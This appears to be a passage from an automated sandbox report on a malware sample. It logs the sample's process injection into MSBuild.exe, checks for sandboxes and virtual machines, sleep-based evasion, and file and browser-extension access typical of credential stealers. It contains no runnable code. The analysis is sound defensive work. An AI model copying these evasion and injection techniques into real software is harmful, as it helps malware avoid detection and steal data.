Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: s4xltbnq.rm5.exe, 00000004.00000002.2256866165.0000000004111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory allocated: 3EE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory allocated: 4110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory allocated: 3F40000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5475 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4368 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496 Thread sleep time: -13835058055282155s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3160 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6888 Thread sleep count: 91 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00413C71 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, 8_2_00413C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_004112E8 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 8_2_004112E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, 8_2_00407891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, 8_2_0040A69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 8_2_00408776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00411D33 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 8_2_00411D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, 8_2_004013DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 8_2_00406784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00412BBE wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 8_2_00412BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 8_2_00409C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 8_2_00408224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0041269A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 8_2_0041269A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00411883 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 8_2_00411883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040DF8C GetSystemInfo,wsprintfA, 8_2_0040DF8C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: s4xltbnq.rm5.exe, 00000004.00000002.2256866165.0000000004111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: s4xltbnq.rm5.exe, 00000004.00000002.2256866165.0000000004111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: powershell.exe, 00000000.00000002.1829039010.0000023DDA597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWeP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_0040E886
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_038EAA45 mov eax, dword ptr fs:[00000030h] 4_2_038EAA45
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_038EA485 mov edx, dword ptr fs:[00000030h] 4_2_038EA485
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_038EADF5 mov eax, dword ptr fs:[00000030h] 4_2_038EADF5
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_038EB094 mov eax, dword ptr fs:[00000030h] 4_2_038EB094
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_038EB095 mov eax, dword ptr fs:[00000030h] 4_2_038EB095
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040D84A lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrcpyA,lstrcatA, 8_2_0040D84A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: s4xltbnq.rm5.exe PID: 764, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle, 8_2_0040F029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 8_2_0040F0CA
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41D000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41F000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000 Jump to behavior
